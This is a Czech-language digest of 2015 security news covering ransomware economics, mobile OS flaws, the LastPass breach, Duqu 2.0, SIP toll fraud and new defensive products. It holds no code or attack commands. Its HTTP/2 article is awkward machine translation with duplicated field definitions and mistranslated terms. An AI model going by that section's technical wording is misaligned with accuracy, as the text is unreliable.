19.6.2015 Kriminalita

Kyberzločin se jednoduše vyplatí, proto ho taky kdekdo na internetu provozuje. Nejvýnosnějším odvětvím jsou prodeje exploitů a vydírání pomocí ransomware. Dobrý „investor“ si tak může přijít až na 1425 % ze své investice, což je číslo, o kterém se běžným byznysmenům snad ani nezdá. Na co se nejčastěji útočí?

Až se vás bude příště někdo ptát, proč to ti zlí hoši vlastně dělají, odpovězte jednoduše: protože se to vyplatí. Společnost Trustwave zveřejnila novou studii, ze které plyne, že je kyberzločin jedním z nejlepších byznys modelů – alespoň co se týče návratnosti vložených investic. O podobných číslech se totiž nesní ani těm nejlepším investorům.

Vydírání na vzestupu

Podle studie se návratnost pohybuje až na hranici 1425 % – za investovaných 5900 dolarů je možné získat zpět 84 100 dolarů. Nejlepší investicí je přitom podle výzkumu nákup exploit kitu a následné vydírání pomocí ransomware.

Matematika je tu přitom velmi jednoduchá: nákup ransomware, infikujícího exploit kitu, služeb pro ukrytí identity a šíření malware pro 20 000 uživatelů vyjde celkem na 5900 dolarů měsíčně. Během měsíční „kampaně“ je možné tímto způsobem z uživatelů dostat asi 90 000 dolarů. To znamená měsíční zisk 84 100 a návratnost investice ve výši 1425 procent.

Zablokovali jsme váš počítač, zaplaťte
Exploit kit se nejčastěji používá k pohodlnému zneužití bezpečnostní díry v prohlížeči, která pak dovoluje přenést do počítače další malware. Ransomware je už konkrétní malware, který nějakým způsobem brání v používání počítače či souborů na něm a od uživatele žádá výpalné. Jak už to s vydíráním bývá, uživatel nemá žádnou jistotu, že útočník po zaplacení splní své sliby.

S takto obrovskými příjmy se nemůžeme divit, že podle McAfee Labs došlo v letošním roce k nárůstu incidentů s ransomware o 165 %. Podle Trustwave mají navíc tyto útoky poměrně velkou úspěšnost: dobře udělaný útok se podaří u 10 % uživatelů. Přibližně 0,5 % obětí přitom skutečně nakonec zaplatí. To sice vypadá jako poměrně malé číslo, ale při průměrné platbě 300 dolarů je to jistě zajímavý příjem.

Karty zase táhnou

Stále populární jsou také útoky na platební systémy se snahou získat data týkající se platebních karet – útočníci po nich jdou v 31 % případů. To je proti roku 2013 nárůst o 12 %. Naopak v případě ostatních osobních údajů došlo k meziročnímu poklesu ze 45 na 20 %. Znamená to, že se útočníci vrací zpět ke klasickým platebním kartám.

Elektronické obchody jsou přitom cílem internetových útoků přibližně ve 42 procentech případů, jde tudíž o jeden z nejčastějších cílů vůbec. Zhruba 40 % útoků se zaměřuje přímo na platební systém, v 18 % směřuje do vnitrní sítě provozovatele. Nejčastěji se útočníci zaměřují na maloobchodní prodejce (43 %), prodejce potravin a nápojů (13 %) a pohostinství (12 %).

Existují prý přitom dvě hlavní skupiny útočníků: jedni nejprve vyhledávají zajímavé cíle a pak v nich hledají chyby; druzí naopak zkoumají chyby a pak se podle nich snaží najít vhodné oběti. První skupina má pevnější plány, svůj systém a vlastní byznys plán. Obvykle se snaží útočit na velké společnosti, získat velké databáze dat a ty poté zpeněžit.

Druhý typ útočníků se naopak snaží získávat peníze za každou cenu a ve velkém: tvoří falešné stránky, přesměrovávají na ně uživatele a plošně instalují malware a ransomware. Tito útočníci jsou také velmi často poskytovateli služeb pro ostatní.

Slabá hesla hlavně na webu

Výzkum prováděný skupinou SpiderLabs na 574 různých úspěšných útocích z roku 2014 ale ukázal také další zajímavé informace. Ukazuje se například, že heslo „Password1“ patří k nejpoužívanějším a 39 % hesel má jen osm znaků. Podle Trustwave trvá prolomení takto krátkého hesla jediný den. Přitom už prodloužení o dva znaky zvýší výrazně obtížnost a potřebná doba se prodlouží na 591 dnů.

Zajímavé také je, že většina (94 %) útoků se podaří právě kvůli slabým heslům nebo špatnému zabezpečení webové aplikace. Jen poměrně malá část je připisovaná zneužití bezpečnostních chyb v software.

Přesto to neznamená, že v software chyby nejsou. Naopak firma tvrdí, že podle jejich průzkumů obsahuje 98 % aplikací nějakou bezpečnostní chybu. Každá taková chyba nemusí být reálnou hrozbou a nemusí být zneužitelná. Je ale zajímavé, že jde často o velmi staré a známé bezpečnostní problémy, které by na většině míst už měly být dávno opravené:

Hlavním problémem vedle samotné úspěšnosti útoků zůstává také fakt, že většina obětí (81 %) problém sama vůbec neodhalí. Přitom včasné odhalení má zásadní dopad na rozsah škod, která útočník napáchá. Medián reakční doby při interním odhalení problému činí 14,5 dne. V případě odhalení externí firmou se doba prodlužuje na 154 dnů.


Apple iOS má obří bezpečnostní chybu. Dovolí obejít i ukrást hesla

18.6.2015 Zranitelnosti

Tým z univerzit v Indianě, Pekingu a Georgii zveřejnil práci, která popisuje masivní bezpečnostní chybu v operačních systémech Applu – jedná se jak o mobilní iOS, tak o počítačový Mac OS X.

Výzkumníci postupovali tak, že vytvořili nenápadně se tvářící aplikaci, která obsahovala malware. Škodlivá část kódu byla tak dobře schovaná, že prošla kontrolou Applu a dostala se do běžné nabídky App Storu. Po nainstalování malware využívá způsob, jakým spolu v rámci systému komunikují jednotlivé aplikace. Umožňuje nejen obcházet hesla, ale také je získat. Může jít o hesla k iCloud, mailovým účtům a dalším službám včetně bankovnictví. Malware se dostane i k dalším datům, které mají být striktně utajená.

431292688
Tým zkoušel svůj postup na řadě nejpoužívanějších aplikací z Apple App Storu a napadnout se povedlo 89 % z nich. Byly mezi nimi také aplikace 1Password a Google Chrome, které schraňují hesla k dalším službám. Schéma útoku se týká aplikace Evernote.
Vedoucí týmu Luyi Xing řekl, že chybu objevili a experiment provedli před mnoha měsíci a veškeré informace předali Applu. Protože se jedná o problém s hloubkovou strukturou systémů, vzal si Apple šest měsíců na vyřešení. Půl roku je pryč (mimochodem mezitím vzniká iOS 9), chyba přetrvává, a tak se výzkumníci rozhodli chybu zveřejnit.


Telefony Samsung Galaxy obsahují závažné bezpečnostní riziko

18.6.2015 Zranitelnosti
Smartphony řady Galaxy jihokorejské společnosti Samsung obsahují závažnou bezpečnostní díru, díky které na ně mohou útočníci na dálku nainstalovat škodlivý kód nebo odposlouchávat hovory.
Telefony Samsung Galaxy obsahují závažné bezpečnostní riziko

Americká společnost NowSecure zveřejnila zprávu, podle které software Swift předinstalovaný na více než 600 milionech zařízeních Samsungu obsahuje díru, jež útočníkům na dálku umožňuje monitorovat trafik uživatele a spouštět na jeho telefonu škodlivé kódy.

Špatnou zprávou je, že aplikaci Swift není možné z telefonu odinstalovat a útočníci mohou díru zneužít i tehdy, pokud uživatel tento software nepoužívá.

Swift má na telefonech řady Galaxy přístup k většině jejich funkcí. Útočník tedy může na zařízení nic netušícího uživatele tajně nainstalovat červa, přistupovat k jeho fotoaparátu, mikrofonu a GPS, odposlouchávat hovory, nechat si přeposílat textové zprávy, či dokonce měnit nastavení aplikací.

Představitelé NowSecure tvrdí, že na chybu upozornili Samsung již v prosinci minulého roku a kromě toho o ní byl vyrozuměn i americký Computer Emergency Readiness Team (CERT) a vývojářský tým Googlu, který pracuje na Androidu. Samsung údajně začal mobilním operátorům distribuovat patch „na počátku roku 2015“, však neví se, kolik z nich aktualizaci poskytlo svým zákazníkům.

Na seznamu potenciálně nebezpečných zařízení jsou i vlajkové lodě Samsungu jako Galaxy S6, S5, S4 či S4 mini.

Jelikož není možné Swift odinstalovat, uživatelé by se podle NowSecure měli vyhýbat nezabezpečeným Wi-Fi sítím a/nebo používat jiné mobilní zařízení. Jak podotkli experti z NowSecure, aplikace SwiftKey dostupná v Google Play, jež je založena na stejném SDK, nemá se Swiftem žádnou spojitost a její instalace či smazání nemá na přítomnost díry vliv. To potvrdil i CMO Swiftkey Joe Bradwood.

„Swift je technologie, kterou dodáváme Samsungu, přičemž na této technologii je postaven systém předpovídání slov, které uživatel píše na klávesnici. Problém však není přímo ve Swiftu ale ve způsobu, jakým je tato technologie do zařízení Samsungu integrována,“ uvedl Bradwood s tím, že zmíněná díra není příliš riziková.

„Uživatel musí být připojen k určité síti, kde čeká hacker připravený se do zařízení nabourat.“


Google bude vyplácet až 750 tisíc korun za díry nalezené v Androidu

18.6.2015 Zranitelnosti
Google rozšiřuje Vulnerability Reward Program, v jehož rámci platí vývojářům za bezpečnostní díry nalezené v jeho webových službách a aplikacích, i na svůj operační systém Android.

Vulnerability Reward Program se nebude vztahovat na všechna androidová zařízení, ale jen na ta, za něž je Google stoprocentně odpovědný a jež jsou v současné době dostupná na trhu.

To konkrétně znamená, že vývojáři mohou hledat díry pouze u zařízení Nexus 6 a Nexus 9. Podle Googlu je tak Nexus „první řadou mobilních zařízení, která je zapojena do obdobného programu“.
 

Google bude vývojářům a dalším IT expertům platit nejen za objevené chyby, ale i za to, pokud s popisem chyby získá i reálný příklad jejího zneužití a/nebo návrh na její záplatu. Odměny se mohou v závislosti na komplexnosti díry vyšplhat až na dva tisíce dolarů (cca 50 000 Kč), přičemž pokud vývojáři poskytnou i zmíněný příklad jejího zneužití či patch, může se finanční kompenzace vyšplhat až na 8000 dolarů (200 000 Kč).

Kromě toho bude Google vyplácet nadstandardní bonusy tehdy, pokud se vývojářům v Androidu podaří proniknout do kernelu, TEE (TrustZone) či procesu Verified Boot. Za průnik do TrustZone či Verified Boot Google vyplatí odměnu ve výši až 30 000 dolarů (750 000 Kč).

Google na svém oficiálním blogu uvedl, že jen za poslední rok vývojářům v rámci programu Vulnerabilty Reward vyplatil přes 1,5 milionu dolarů. Kromě toho představitelé amerického gigantu dodali, že v budoucnu plánují dotovat i různé hackerské soutěže podobné Pwn2Own, které se budou týkat Androidu.


CZ.NIC a Jablotron spolupracují na internetu věcí

16.6.2015 Analýzy
Cílem jsou bezpečné domácnosti ovládané na dálku prostřednictvím routeru Turris a produktů a služeb od Jablotronu.

Společný projekt CZ.NIC a Jablotronu zahrnuje výrobu produktů a s ní spojenou realizaci služeb pro internet věcí v domácnostech. Základem společné aktivity obou společností bude router Turris vyvíjený od minulého roku na půdě CZ.NIC.

V představách obou firem bude bezpečnostní systém oddělen od ovládání domácnosti. Všechny služby a funkce poběží na Turrisu druhé generace vyvíjeném organizací CZ.NIC a budou využívat čidla, měřiče, ovladače, související cloudové aplikace a monitoring od Jablotronu.

Nový Turris Lite bude podle předsedy CZ.NIC Ondřeje Filipa stát mezi stem až dvěma sty dolarů, bude ale napěchovaný konektory a sloty umožňujícími propojení s nejrůznějšími zařízeními. Vyšší ceně odpovídá i konfigurace se čtyřikrát rychlejším procesorem, 16x větší RAM a 16x větším flashovým úložištěm v porovnání s běžnými routery.

Turris není jen router – je schopen sbírat a analyzovat data z internetového provozu, identifikovat podezřelé datové toky a využívat údaje pro správné nastavení bezpečnostních funkcí. Otevřená architektura provozovaná pod linuxovým operačním systémem může zpracovávat i data ze zařízení pro chytrou domácnost a zpětně je řídit.

Turris Lite se bude kompletovat v České republice pravděpodobně přímo v Jablotronu, který by měl být schopen dojednat množstevní slevy z ceny jednotlivých komponent. Výroba by měla začít na přelomu letošního a příštího roku a zájemci o nový model se mohou přihlásit už nyní.

Projekt Turris vznikl v roce 2013 a jeho cílem je pomocí stejnojmenného routeru pomáhat uživatelům s ochranou domácí sítě. V současnosti je do projektu zapojeno přes 1 000 uživatelů internetu z České republiky i ze zahraničí. V následujících měsících rozšíří tuto skupinu uživatelů další tisíc zájemců o účast v projektu, kteří budou moci využívat Turris Lite.

Obě organizace plánují vybrat ze současných uživatelů sto nejaktivnějších, s jejichž pomocí budou testovat nové nápady uživatelské komunity a ty nejslibnější využít v nové verzi routeru i v produktech Jablotronu.


RFC 7540 - HTTP / 2 protokol

16.6.2015 Bezpečnost
RFC 7540 byl venku na měsíc teď. Co bychom měli očekávat, že s touto novou verzí?

1. Nový rám: HTTP / 2 implementuje binární protokol s následující strukturou rámu:

Délka: Délka rámu užitečného zatížení vyjádřené jako bez znaménka 24-bitové celé číslo. Hodnoty vyšší než 2 ^ 14, nesmí být odeslána, pokud je přijímač nastaven větší hodnotu pro parametr SETTINGS_MAX_FRAME_SIZE.
Typ: typ 8-bitové rámu. Určuje formát a sémantiku rámu. Implementace musí ignorovat a zrušit jakýkoli snímek, který má typ, který je unknow. Následující typy jsou definovány:
Délka: Délka rámu užitečného zatížení, vyjádřená jako 24 bitové celé číslo bez znaménka. Hodnoty vyšší než 2 ^ 14, nesmí být odeslána, pokud je přijímač nastaven větší hodnotu SETTINGS_MAX_FRAME_SIZE.
Typ: typ 8-bitové rámu. Typ rámu určuje formát a sémantiku rámu. Implementace musí ignorovat a zlikvidujte jakýkoliv snímek, který má typ, který je neznámý. Následující typy jsou povoleny:
Údaje: Druh 0x0, který se používá pro přenos dat pravidelně v souvislosti.
Záhlaví: Typ 0x1, který se používá k otevření proudu a navíc nese fragment záhlaví bloku.
Priorita: Typ 0x2, určuje odesílatele-radil prioritu proudu
RST_STREAM: Typ 0x3, umožňuje okamžité ukončení proudu. RST_STREAM je poslán požadovat zrušení proudu nebo uvést, že došlo k chybě podmínku
Nastavení: Typ 0x4, který se používá k přenosu konfiguračních parametrů, které ovlivňují, jak koncové body komunikace, jako jsou preference a omezení na vzájemné chování. Rám nastavení se používá také pro potvrzení přijetí těchto parametrů.
PUSH_PROMISE: Typ 0x5, který se používá k oznámit vzájemného koncový bod před potoků odesílatel hodlá zahájit.
Ping: Typ 0x6, který se používá jako mechanismus pro měření minimální dobu zpáteční od odesílatele, jakož i zjištění, zda je nečinné připojení je stále funkční.
GOAWAY: 0x7, který se používá k iniciaci vypnutí o připojení nebo pro signalizaci závažných stavů chyb. GOAWAY umožňuje koncový bod, aby elegantně přestane přijímat nové proudy a přitom konečné obrábění dříve zavedených toků.
WINDOW_UPDATE: type = 0x8, který se používá k implementaci řízení toku.
Pokračování: type = 0x9, který se používá pro pokračování sekvenci záhlaví bloku fragmentů. Jakýkoliv počet Pokračování snímků může být odeslán, pokud předchozí snímek je na stejném proudu a je hlavičkovém, PUSH_PROMISE, nebo pokračování rám bez END_HEADERS nastaveným příznakem.
Vlajky: 8-bitové pole vyhrazené pro boolean značky, které jsou specifické pro typ rámu
R: rezervovaný 1-bitové pole.
Stream Identifikátor: identifikátor tok vyjádřený jako nepodepsané 31-bitové celé číslo. Hodnota 0x0 je vyhrazena pro rámy, které jsou spojeny s připojením jako celku na rozdíl od jednotlivého proudu.
2. Bezpečnost:

Implementace HTTP / 2, musí používat TLS verze 1.2 nebo vyšší pro HTTP / 2 přes TLS. Je třeba dodržovat obecné pokyny Využití TLS v RFC 7525.
Implementace TLS musí podporovat Name Server Indikace (SNI) rozšíření TLS. HTTP / 2 klienti musejí uvádět název cílové domény při vyjednávání TLS.
3. Podpora prohlížečů: Následující Podpora prohlížeče seznam resumé pro HTTP / 2 v této době:

Chrome podporuje HTTP / 2 ve výchozím nastavení, od verze 41.
Google Chrome Canary podporuje HTTP / 2 ve výchozím nastavení, ve verzi 43
Chrome pro iOS podporuje HTTP / 2 ve výchozím nastavení, ve verzi 41
Firefox podporuje HTTP / 2, která byla ve výchozím nastavení povolena, od verze 36.
Internet Explorer podporuje HTTP / 2 ve verzi 11, ale pouze pro systém Windows 10 beta, a je ve výchozím nastavení povoleno.
Opera podporuje HTTP / 2 ve výchozím nastavení, od verze 28.
Safari podporuje HTTP / 2 ve verzi 8.1, ale pouze pro OS X v10.11 a iOS 9.


LastPass pod útokem. Změňte hlavní heslo

16.6.2015 Incident

Používáte na ukládání hesel službu LastPass? V tom případě co nejdříve změňte své hlavní heslo, LastPass totiž na sklonku minulého týdne napadli hackeři a prolomili se do jeho databáze.

Ačkoliv k průniku došlo již v pátek, služba se na svém blogu s aférou pochlubila až nyní. Podle šetření se sice útočníkům nepodařilo získat samotná uložená hesla – ta byla dobře zabezpečená, ale získali přístup ke kontaktním údajům (e-mail aj.) a hashům hlavních přístupových hesel. Právě proto je třeba změnit primární heslo, aby se k němu reverzní analýzou útočníci přeci jen nedostali.

654937378
Útok nejspíše otřese důvěryhodností podobných služeb a nejeden uživatel se začne právem ptát, jestli není přeci jen lepší jako trezor na hesla používat vlastní paměť.

LastPass patří k nejpopulárnějším trezorům pro hesla. Služba spravuje a generuje hesla do vašich webových služeb, čili si je nemusíte pamatovat a zároveň můžete na každé používat jinou variantu, čímž se zvyšuje celková bezpečnost. Toto bezpečnostní schéma však funguje pouze v případě, pokud je naprosto bezpečný samotný trezor.


Zero day útoky se používají i proti menším firmám

15.6.2015 Zranitelnosti
Ekosystém počítačového zločinu dnes zahrnuje prakticky veškeré potřebné komponenty, na černém trhu lze koupit nebo pronajmout vše. Pokročilé postupy útoků již nevyžadují žádné vlastní technické znalosti. Objevovaných zranitelností je tolik, že se nevyplatí si je šetřit na speciální cíle a útočníci si mohou dovolit je nasazovat plošně. Vážně ohroženy jsou organizace všech velikostí.
Zero day útoky se používají i proti menším firmám

V posledních měsících bylo provedeno několik průzkumů a studií, jejichž výsledky ukazují na aktuální trendy kybernetické kriminality. Ačkoliv stále více výrobců softwaru za nalézání a reportování bezpečnostních chyb platí, mnoho zranitelností nultého dne (zero day) se stále dostává i do rukou podvodníků.

Trh je tak rozvinutý, že stejná zranitelnost bývá zpravidla objevena i prodána vícekrát nezávisle na sobě. Podvodníkům se pak nevyplatí chyby si šetřit na zvlášť důležité cíle, nejvíce vydělá ten, kdo s akcí přijde jako první – brzy poté zareagují dodavatelé zabezpečení a další pokusy o zneužití už nebudou tak účinné. I malé firmy se tak stále častěji stávají terčem sofistikovaných útoků.

Rychlé infekce

Analýza společnosti Verizon se zaměřila na účinnost phishgingu, což je při útocích stále jedna z nejčastěji používaných metod. Ačkoliv se s phishingem pro jeho všudypřítomnost setkal snad každý, tato metoda překvapivě neztrácí na efektivitě.

Podle Verizonu je v podnikovém prostředí dnes phishing účinný především kvůli tomu, že některá oddělení mají otevírání a reakce i na nevyžádané e-maily v popisu práce. Zaměstnanci technické podpory, právního oddělení či vztahů s veřejností mají prostě za úkol otevírat i nevyžádané e-maily od neznámých adresátů, nelze je vyškolit, aby to nedělali. I když vzdělávání uživatelů má v mixu obranných technik své místo, potřeba je nasazovat i adekvátní technické prostředky.

Závěry studie také ukazují, že oběti na phishing naletí obvykle velmi rychle, už v řádu minut po zahájení útoku. Z toho důvodu nelze plně spoléhat na definice malwaru. Než se bezpečnostní systém stihne aktualizovat, infekce je často již v plném proudu. Výhodu zde ale mají ti, kdo používají řešení fungující efektivně na principech cloudu a rozšířené po celém světě – díky tomu lze informace sdílet podstatně rychleji. Například základna produktů Avast představuje asi 230 milionů uživatelů.

Vše k pronajmutí

Studie Websense 2015 Threat Report uvádí, že počítačová kriminalita dnes prakticky plně kopíruje legální softwarové trhy. Malware i infrastruktura (řídicí servery, ovládané botnety...) se přeprodávají, prodává se software i služba, na černém trhu funguje marketing a je k dispozici technická podpora produktů. Útočník proto zdaleka nemusí mít všechny potřebné technické dovednosti, vše si může snadno koupit i pronajmout.

Podle statistik organizace AV-Test bylo v posledních 2 letech vytvořeno více nového malwaru než za celé předešlé desetiletí. Opět z toho vyplývá, že bezpečnostní řešení, která rozpoznávají škodlivý kód na základě definic (signatur) ztrácejí svou účinnost a úroveň ochrany potřebnou v podnikové sféře poskytnou pouze moderní nástroje založené na behaviorální analýze.

Aktualizace nestačí

Zero day útoky a účinný phishing znamenají, že firmy jsou ohroženy, i když si pečlivě aktualizují svůj software. Velký význam v této souvislosti získávají filtry, které blokují škodlivé weby, podezřelé odkazy v sociálních sítích, rozpoznávají e-maily podle jejich obsahu a analyzují jejich přílohy.

Moderní bezpečnostní produkty se rovněž snaží škodlivé kódy nejprve spouštět ve virtuálních prostředích (sandboxech). Ani tyto metody ochrany ale nejsou 100% účinné. V poslední době čím dál víc malwaru při svém spuštění testuje, zda neběží ve virtuálním stroji nebo sandboxu, a v takovém případě se škodlivé chování často vůbec neaktivuje.

Za situace, kdy 100% bezpečnost těžko zajistit, je třeba volit priority. Některé části firemní sítě si zaslouží speciální ochranu, obsahují např. kritická data nebo zálohy z koncových zařízení, na která cílí stále populárnější ransomware. Vedle zabezpečení koncových bodů by podniky proto měly také zvážit nasazení speciálních řešení na úrovni serverů. Společnost Avast zde nabízí aplikace pro ochranu e-mailových i souborových serverů a speciálně pro MS Exchange, SharePoint a Small Business Server.

Renesance makrovirů

K dalším trendům kybernetické kriminality patří dnes makroviry. Jedná se o metodu starou a málem zapomenutou, která ale v současnosti zažívá renesanci. Na rozdíl od spustitelných souborů nebývají dokumenty s makry běžně blokovány na úrovni e-mailové brány. Uživatele je obvykle třeba přimět k povolení maker metodami sociálního inženýrství. V některých prostředích pak bývají makra ale povolena standardně – často jde o finanční či analytická oddělení podniku, která pro útočníky samozřejmě představují zvlášť zajímavý cíl.


Kaspersky lab napadli hackeři, kompromitovali firemní systémy

15.6.2015 Incidenty

Až tři doposud neznámé techniky byly použity k úspěšné kompromitaci počítačových systémů Kaspersky Lab. Na světě je Duqu 2.0.
Možná to staré rčení znáte, možná jste ho slyšeli v jedné takřka legendární scifi. „Shit happens“ totiž platí takřka univerzálně, v tomto případě se to špatné stalo Kaspersky Lab. Útok hackerů na počítačové systémy byl úspěšný a došlo ke kompromitaci.

Kaspersky Lab uvádějí, že útok byl komplexní, skrytý a využíval několik 0day zranitelností. Navíc za ním údajně stojí nejmenovaná vláda. Po zjištění a zmapování útok získal i jméno – Duqu 2.0, tedy druhá generace známého Duqu, který ale do světa vyrazil už někdy v roce 2011. A u kterého se předpokládalo, že jej původní tvůrci opustili a v pozdějších letech se vrátil pouze v rukou některých dalších útočníků.

Útok na počítače v Kaspersky Lab využíval 0day zranitelnost v jádře Windows (CVE-2015–2360) a velmi pravděpodobně až další dvě doposud neopravené zranitelnosti, které fungovaly jako 0day v době útoku. Cílem útoku mělo být proniknutí do systémů Kasperky Lab a špionáž – technologická, ale i co se výzkumů a interních procesů týče. Případné detaily je možné najít v The Duqu 2.0 – Technical Details (PDF).

Mimo pevné disky

Útok začal zacílením na zaměstnance v jedné z menších kanceláří společnosti, pravděpodobně s pomocí e-mailu. Po úspěšném napadení počítače následovalo klasické zkoumání prostředí – opět s využitím 0day (CVE-2014–6324) – a získáním správcových práv k doméně a následnému infikování dalších počítačů. Tam už je to vcelku jednoduché, protože stačí připravit MSI balíčky a nasadit je na další stroje s pomocí klasického MSIEXEC.EXE. Vlastní instalovaný software už ale zdaleka tak triviální není, používá několik způsobů šifrování a různé techniky znesnadňující objevení.

Výsledkem je napadený počítač, kde je k dispozici vzdálený backdoor o poměrně malé paměťové velikosti, a také kompletní platforma pro špionáž s podstatně většími nároky na paměť. To vše šířené periodicky doménovými řadiči a schopné využít pokročilé možností pluginů, které mohou dodávat další potřebné funkčnosti. Špionážní funkce zahrnují řadu možností – snímání klávesnice, práci se soubory, přístup do databází, záznamy provozu na síti a řadu dalších možností.

Další zajímavostí u Duqu 2.0 je, že malware žije hlavně v paměti počítačů a využívá k tomu prioritně systémů, u kterých je jasné, že fungují dlouhodobě a bez vypínání či restartů. Tyto systémy pak následně infikují další počítače v síti. Neukládat data na disky je jednou z cest, jak se vyhnout možné detekci. Nevýhoda, kterou by přineslo například náhlé vypnutí všech počítačů, je eliminována instalováním ovladačů do malého množství počítačů, které mají přímou internetovou konektivitu. Tyto počítače pak slouží pro tunelování z internetu do vnitřní sítě.

Podstatnou součástí je klasický C&C (Command and Control) mechanismus umožňující vzniklou síť kompromitovaných počítačů řídit – u Duqu je zajímavé, že řídící data jsou přenášeny jako součást jinak neškodných souborů – u verze z roku 2011 šlo o JPEG, v novějších verzích je to navíc ještě GIF.

Útok sice úspěšný, nic víc se nepodařilo

Vraťme se ale zpět k úspěšné kompromitaci počítačů a sítě v Kaspersky Lab. Tu se podařilo odhalit, částečně i prostřednictvím nově vyvíjených bezpečnostních řešení. Jakkoliv se útočníkům podařilo dostat dovnitř, nic dalšího podstatného se jim podle firmy provést nepovedlo – žádné produkty ani služby nebyly kompromitovány.

Zkoumání a vyšetřování stále probíhá, pro Kaspersky Lab může být odhalení útoku a získání technologií k němu použitých nakonec i poměrně užitečnou událostí. Firma dostala do rukou kompletní útočný arzenál a může zlepšit detekční i ochranné mechanismy.

Objevené 0day bylo nahlášeno Microsoftu, ten už je opravil. Odkud útok pocházel, Kaspersky Lab nezveřejní, ale říkají, že v několika zemích předali informace příslušným orgánům, aby bylo možné zahájit tamní šetření.


Spousta peněz za telefon? To se nikomu nelíbí

13.6.2015 Hrozby
Problém s přemrštěnými náklady na telefonování vznikl poté, kdy konzultant změnil konfiguraci a otevřel řídicí porty do internetu bez vyžadované autentizace.

Jako manažer bezpečnosti očekávám, že na naši společnost bude útočit záplava malwaru, bude docházet k pokusům o krádeže dat, útokům DoS a k pokusům o neoprávněný přístup. Všechny případy řeším při jejich výskytu, díky čemuž je moje práce pořád zajímavá.

Některé události však upoutají nejen pozornost moji, ale také našeho vedení. Bývají to incidenty vedoucí k přímé ztrátě buď peněz, nebo velmi citlivých dat. Samozřejmě že to jsou případy, kterým chci zabránit v největší míře nehledě na to, zda jsou pracovně zajímavé nebo ne.

Když dojde několikrát do roka k podobnému typu bezpečnostní události s finanční ztrátou, změní se zajímavost velmi rychle ve frustraci.

Minulý týden mi finanční analytička zpracovávající platby pro IT oddělení řekla, že dostala upozornění od našeho poskytovatele telekomunikačních služeb, že nám za méně než jeden den naskočily poplatky v řádu desítek tisíc korun za telefonní hovory do Kostariky, Bolívie a Kolumbie.

Protože v žádné z těchto zemí nepodnikáme a ani nemíváme mezinárodní hovory v takovéto výši během necelých 12 hodin, vypadalo to jako nějaký druh napadení.

Ale jak? Jen před několika měsíci byl náš telefonní systém napadený a můj tým společně s interním oddělením telekomunikací strávil několik týdnů implementací bezpečné konfigurace našich bran pro IP telefonii. V bezpečnost našich bran jsem tedy dodnes měl naprostou důvěru. Co se tedy stalo?

Když jsem mluvil s naším manažerem telekomunikačních služeb o poslední faktuře za mezinárodní hovory, začal mít podezření, co se mohlo stát. Trochu jsme zapátrali a zjistilo se, že jeho podezření bylo správné.

Náš smluvní dodavatel totiž pracoval na nové infrastruktuře pro videokonference včetně serveru umístěného v naší demilitarizované zóně pro zpracování videohovorů mezi námi a vzdálenými místy. Dohled přitom ale měli naši lidé.

S oním dodavatelem se několikrát sešla naše komise pro kontrolu ICT architektury, abychom zajistili, že se použijí dostatečně bezpečné zásady a konfigurace. I během implementace došlo několikrát k ověření, že náš partner dodržuje vše potřebné.
 

Přezkum současné konfigurace videokonferenčního serveru (VCS) však ukázal, že jejich konzultant změnil konfiguraci, otevřel port 5060 a povolil protokol SIP a další řídicí porty do internetu, aniž byla nutná nějaká autentizace.

Poplatky nezaplatíme ze svého

Konzultant tedy okamžitě musel tuto zranitelnost odstranit, aby se předešlo dalším neautorizovaným hovorům. Potom jsme začali sledovat síťová připojení k VCS a pozorovali jsme tabulku připojení. A co myslíte, že jsme zjistili? Objevili jsme stovky pokusů o připojení ze serverů v Kostarice, Bolívii a Kolumbii.

Je zřejmé, že v čase, kdy byly naše telefonní brány vůči internetu otevřené, někdo proskenoval náš prostor IP adres (zjistili jsme, že se to děje stále) a objevil otevřený port. Tato osoba potom jednoduše nasměrovala svou vlastní IP bránu do naší infrastruktury a směrovala své hovory přes nás.

Tyto aktivity mohou být ziskové. Lze je zvládnout pomocí bezplatného open source softwaru pro pobočkové ústředny, jako jsou například Asterisk a SIP Witch. Jakmile našli otevřený port bez autentizace, mohli tito zlí chlapíci informace o tom prodat někomu dalšímu, který také mohl využívat bezplatné spojení, nebo dokonce i přeprodávat levnější hovorné.

Dokázali jsme tedy zacelit díru, která nás stála spoustu peněz, ale management nebude spokojený, dokud se nám nepovede tyto ztráty kompenzovat.

Reakce našeho poskytovatele telekomunikačních služeb ale nebyla povzbudivá. Naše ztráty podle nich nelze u nich uplatnit. Na druhou stranu konzultant zmíněného dodavatele uznal svou chybu a slíbil, že nám jejich firma škody uhradí.


Aplikace ve Windows 10 budou poprvé nativně propojené s antiviry

12.6.2015 Bezpečnost
Microsoft oznámil, že nový operační systém Windows 10 umožní vývojářům přímo propojit jejich aplikace s antivirovým systémem, který je už na počítači uživatele nainstalovaný.

Jak uvedli představitelé amerického gigantu, nová funkce s názvem Antimalware Scan Interface (AMSI) umožní aplikacím odesílat obsah přímo do antivirového programu nainstalovaného na počítači uživatele.

To se může podle bezpečnostních expertů hodit především při práci se skripty, které útočníci často využívají k tomu, aby obešli kontrolu prováděnou antivirovými programy. Skripty jsou většinou spouštěny přímo v paměti aplikace, tudíž se na disku nevytváří samostatný soubor, který by antivirový program mohl skenovat.

„Aplikace nyní mohou volat novou Windows AMSI API a vyžádat si od ní sken potenciálně nebezpečného obsahu,“ uvedl na oficiálním blogu Microsoftu Lee Holmes s tím, že skripty nejsou tím jediným, co lze pomocí nové funkce skenovat.
Aplikace určené pro chatování například mohou v reálném čase hledat odkazy na škodlivé webové stránky v odesílaných zprávách a zablokovat je ještě před tím, než se uživateli zobrazí. A skenovat bude podle Holmese možné i různé plug-iny.

Technická příručka k AMSI uvádí, že nová funkce umožňuje „skenování souborů a paměti, či streamu dat a další obsah.“

Jak však uvedl Catalin Cosoi ze společnosti BitDefender, podle jeho názoru nebude mít nová funkce v příštích několika letech na bezpečnost uživatelů příliš velký dopad, jelikož pokud má být opravdu efektivní, bude třeba, aby se ji tvůrci aplikací naučili používat. A otázkou také je, kolik z nich bude mít o AMSI zájem.

Podle Cosoie to navíc tvůrci aplikací nebudou mít vůbec snadné, jelikož jejich software bude muset odpovědi antivirového enginu korektně vyhodnocovat, což může být občas obtížné. Jasné zatím není ani to, jak moc bude Microsoft novou funkci propagovat a vývojářům „nutit“.


Nové ochranné řešení pro MS Exchange má Eset

11.6.2015 Zabezpečení
Betaverzi řešení Mail Security 6 představil Eset. Novinka pro ochranu e-mailové komunikace -- mailboxů i serverového prostředí -- přináší další vrstvy ochrany a také nové uživatelské rozhraní.
Nové ochranné řešení pro MS Exchange má Eset

Klíčovými ochrannými technologiemi nového řešení jsou Antivirus, Antispyware
a Antispam.

